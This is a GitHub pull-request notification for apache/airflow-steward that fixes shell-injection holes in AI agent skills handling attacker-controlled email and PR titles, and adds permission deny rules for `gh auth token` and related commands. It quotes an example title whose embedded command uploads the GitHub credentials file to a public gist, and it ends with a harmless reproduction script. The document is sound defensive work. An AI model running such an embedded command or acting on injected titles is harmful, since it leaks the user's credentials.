andrew opened a new pull request, #88: URL: https://github.com/apache/airflow-steward/pull/88
Follow-up to #81 and #84.

The `printf '%s' "<x>"` recipe that #81 introduced for getting attacker-controlled strings (email subjects, PR titles, scanner-finding titles) into tempfiles before passing to `gh api -F field=@file` still routes the string through a double-quoted shell argument. The shell expands `$(...)`, backticks and `$VAR` in `"<x>"` before `printf` ever runs, so a subject like `RCE in $(gh gist create ~/.config/gh/hosts.yml --public)` still executes. The old single-quoted form was vulnerable to `'` breakout; the new form is vulnerable to `$` / backtick / `"` breakout. #84 then encoded the same recipe as Pattern 1 and Pattern 3 of `write-skill/security-checklist.md`, so every future skill scaffolded through that flow would inherit it.

This replaces the recipe with an instruction to use the Write tool (not Bash) to put the attacker bytes on disk. The Write tool takes content as a literal parameter with no shell tokenisation; `gh api -F field=@file` then reads it verbatim.

Applied at all six recipe sites across the three import skills, and at Patterns 1 and 3 of the write-skill checklist. Each site now also carries an explicit "never `printf '%s' "<x>"`" warning so the old form doesn't creep back.

Also in `.claude/settings.json`:

- `gh auth token` and `gh auth refresh` added to `permissions.deny`. `gh auth token` prints the GitHub token to stdout with no prompt, so any successful injection that reaches Bash can exfil it via the already-allowlisted `api.github.com`.
- `gh workflow run *` added to `permissions.ask`.
- Flag-first variants `gh api --method *` and `gh api --input *` added alongside the existing `gh api * --method *` / `gh api * --input *` so argument ordering can't sidestep the pattern.

Not in this PR: fencing the verbatim bodies in `import-from-pr` / `import-from-md` (finding 5 follow-up), and committing the audit gist into `docs/security/`. Both are smaller and can land separately.
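Added example, not part of the pull request or the project's code: a shell check that reproduces the quoting behaviour described above with two constructed, harmless titles (the embedded command is only `echo INJECTED`). The function names are hypothetical, and `literal_write` is a stand-in for the Write tool, assuming only that the title reaches the file as data rather than as command text.

```shell
#!/bin/sh
# Added illustration (not project code). Titles are constructed and harmless:
# the embedded command is only `echo INJECTED`.
T_SUBST='RCE in $(echo INJECTED)'      # targets the double-quoted recipe
T_QUOTE="RCE in '\$(echo INJECTED)'"   # targets the older single-quoted recipe

# Recipe from #81: the title is pasted into a double-quoted slot of command
# text, so the shell that parses the command expands $(...), backticks, $VAR.
recipe_double() { sh -c "printf '%s' \"$1\""; }

# Older recipe: single-quoted slot; a ' in the title closes the quote early.
recipe_single() { sh -c "printf '%s' '$1'"; }

# Stand-in for the Write tool (assumption): the title arrives as data in a
# variable and is never re-parsed as command text.
literal_write() { printf '%s' "$1"; }

# check WRITER TITLE -> prints "literal" if the bytes on disk equal the title,
# "expanded" if a shell rewrote them on the way.
check() {
    out=$(mktemp) || return 1
    "$1" "$2" > "$out" 2>/dev/null
    if [ "$(cat "$out")" = "$2" ]; then verdict=literal; else verdict=expanded; fi
    rm -f "$out"
    printf '%s\n' "$verdict"
}

# Print the full matrix: each quoting style fails on a different title.
for writer in recipe_single recipe_double literal_write; do
    for title in "$T_SUBST" "$T_QUOTE"; do
        printf '%-14s %-28s %s\n' "$writer" "$title" "$(check "$writer" "$title")"
    done
done
```

The same comparison (bytes on disk against the original string) works as a regression test for any skill that stages untrusted text in a tempfile.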
